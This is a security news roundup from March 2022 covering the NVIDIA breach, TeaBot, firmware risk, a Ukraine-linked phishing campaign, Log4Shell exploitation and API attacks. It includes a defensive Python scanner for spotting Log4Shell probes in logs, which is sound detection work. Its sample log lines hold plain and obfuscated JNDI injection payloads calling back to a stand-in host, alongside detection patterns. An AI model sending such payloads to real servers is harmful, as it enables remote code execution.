AboutDFIR.com – The Definitive Compendium Project

InfoSec News Nuggets 03/03/2022

NVIDIA Confirms Employee Credentials Stolen in Cyberattack

NVIDIA this week acknowledged that employee credentials were stolen during a cyberattack on February 23 and confirmed that the attackers have started leaking the information online. The compromise impacted certain “IT resources,” an NVIDIA spokesperson told SecurityWeek. “Shortly after discovering the incident, we further hardened our network, engaged cybersecurity incident response experts, and notified law enforcement,” the NVIDIA spokesperson added. While the investigation into the incident continues, NVIDIA says that it hasn’t found evidence that ransomware was deployed on its network.


TeaBot Android Banking Trojan continues its global conquest with new upgrades

The TeaBot Remote Access Trojan (RAT) has been upgraded, leading to a sharp increase in both its targets and its spread worldwide. On March 1, the Cleafy research team said TeaBot now targets over 400 applications, pivoting from an earlier focus on “smishing” to more advanced tactics. Smishing attacks compromise mobile handsets via spam text messages containing malicious links. These links, typically pretending to be from a bank, social media network, or delivery company, lead victims to fraudulent websites that request their personal data and account credentials.


U.S. Gov: Firmware Security is ‘Single Point of Failure’

The U.S. government, at the very highest levels, is calling attention to major weaknesses in the firmware supply chain, warning that the layer below the operating system is fertile ground for devastating hacker attacks. A new joint draft report issued by leadership of the U.S. Department of Homeland Security (DHS) and Department of Commerce said firmware presented “a large and ever-expanding attack surface” for malicious hackers to subvert the core of modern computing. “Securing the firmware layer is often overlooked, but it is a single point of failure in devices and is one of the stealthiest methods in which an attacker can compromise devices at scale.”


State Actor Uses Compromised Private Ukrainian Military Emails to Target European Governments and Refugee Movement

Proofpoint researchers have identified a phishing campaign originating from an email address (ukr[.]net) that appears to belong to a compromised Ukrainian armed service member. This discovery comes on the heels of alerts by the Ukrainian Computer Emergency Response Team (CERT-UA) and the State Service of Special Communications and Information Protection of Ukraine about widespread phishing campaigns targeting private email accounts of Ukrainian armed service members by ‘UNC1151’, which Proofpoint tracks as part of TA445. The email observed by Proofpoint may represent the next stage of these attacks. It carried a malicious macro-enabled attachment whose social engineering lure referenced the Emergency Meeting of the NATO Security Council held on February 23, 2022; the macro attempted to download Lua-based malware named SunSeed. The campaign targeted European government personnel tasked with managing transportation and population movement in Europe. While Proofpoint has not definitively attributed this campaign to TA445, researchers acknowledge that the timeline, the use of compromised sender addresses aligning with Ukrainian government reports, and the victimology of the campaign align with published TA445 tactics, including the targeting and collection around refugee movement in Europe.


Log4shell exploits now used mostly for DDoS botnets, cryptominers

The Log4Shell vulnerability in the widely used Log4j software is still leveraged by threat actors today to deploy various malware payloads, including recruiting devices into DDoS botnets and planting cryptominers. According to a report by Barracuda, the past couple of months were characterized by dips and spikes in the targeting of Log4Shell, but the volume of exploitation attempts has remained relatively constant. After analyzing these attacks, Barracuda determined that most exploitation attempts came from US-based IP addresses, followed by Japan, central Europe, and Russia. In December 2021, researchers found Log4j 2 versions from 2.0-beta9 through 2.14.1 to be vulnerable to CVE-2021-44228, dubbed “Log4Shell,” a critical zero-day remote code execution flaw.
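Because the exploitation attempts Barracuda describes arrive as ordinary web requests, the first place a defender sees them is the access log. The trigger string `${jndi:...}` is rarely sent in the clear; scanners wrap it in Log4j's own lookup syntax (`${${lower:j}ndi:...}`, `${::-j}`) and in URL encoding to slip past naive pattern matches. The following added example (written for this page, not Barracuda's or anyone else's tooling) first undoes those transformations and only then searches for the trigger. The log lines, client addresses and callback host are constructed for the example.

```python
"""Triage helper: flag Log4Shell (CVE-2021-44228) probes in web-server access logs.

Added example, not part of the news item. Attackers hide the "${jndi:" trigger
behind Log4j lookup syntax such as ${${lower:j}ndi:...} or ${::-j} and behind
URL encoding, so obfuscation is stripped before the trigger is searched for.
"""
import re
from urllib.parse import unquote

# Constructed sample lines (not real traffic). 203.0.113.x clients and the
# 198.51.100.7 callback host are documentation addresses.
SAMPLE_LOGS = [
    '203.0.113.5 - - [01/Mar/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Mar/2022:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.12 - - [01/Mar/2022:10:00:03 +0000] "GET /?x=${${lower:j}${lower:n}${::-d}i:${lower:rmi}://198.51.100.7:1099/o} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '203.0.113.15 - - [01/Mar/2022:10:00:04 +0000] "GET /login HTTP/1.1" 200 88 "-" "%24%7Bjndi%3Adns%3A%2F%2F198.51.100.7%2Fx%7D"',
    '203.0.113.20 - - [01/Mar/2022:10:00:05 +0000] "GET /docs HTTP/1.1" 200 88 "-" "Mozilla/5.0 (compatible; Googlebot)"',
]

# ${lower:x} / ${upper:x} -> x : case-conversion lookups used purely as obfuscation.
_CASE = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}', re.I)
# ${anything:-x} -> x : default-value syntax; ${::-j} evaluates to "j" in Log4j.
_DEFAULT = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')
# The trigger itself, matched only after obfuscation has been stripped.
_JNDI = re.compile(
    r'\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds|http)\s*:[^}]*\}', re.I)


def normalize(text, max_rounds=10):
    """Undo URL encoding and nested Log4j lookups until the string stops changing."""
    text = unquote(unquote(text))  # covers single and double URL encoding
    for _ in range(max_rounds):    # bounded so a deeply nested payload cannot spin forever
        stripped = _CASE.sub(lambda m: m.group(1),
                             _DEFAULT.sub(lambda m: m.group(1), text))
        if stripped == text:
            break
        text = stripped
    return text.lower()


def scan_log_lines(lines):
    """Return one finding per line that carries a JNDI lookup after normalization."""
    findings = []
    for line in lines:
        match = _JNDI.search(normalize(line))
        if match:
            findings.append({
                'src': line.split(' ', 1)[0],      # client address, first field of the line
                'scheme': match.group(1).lower(),  # ldap, rmi, dns, ... (callback protocol)
                'payload': match.group(0),         # de-obfuscated lookup for the analyst
            })
    return findings


if __name__ == '__main__':
    for f in scan_log_lines(SAMPLE_LOGS):
        print(f"{f['src']:<15} {f['scheme']:<5} {f['payload']}")
```

Run against the constructed lines, the scanner reports three probes (ldap, rmi and dns callbacks) and ignores the two benign requests. The normalizer only undoes the case-conversion and default-value tricks plus URL encoding; Log4j also supports `${env:...}`, `${sys:...}` and `${date:...}` lookups, and anything the normalizer does not strip will not be matched, so treat this as a triage aid for log review rather than as a substitute for patching to a fixed Log4j release.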


Attacks abusing programming APIs grew over 600% in 2021

Security analysts warn of a sharp rise in API attacks over the past year, with most companies still following inadequate practices to tackle the problem. Specifically, Salt Security reports that API attack traffic grew by 681% in 2021, while overall API traffic increased by 321%. These figures underline that as industries adopt API solutions, attacks against them are growing disproportionately. All data presented in Salt Security’s report comes from a survey of 250 employees, drawn from a diverse demographic, working for companies of varied sizes.
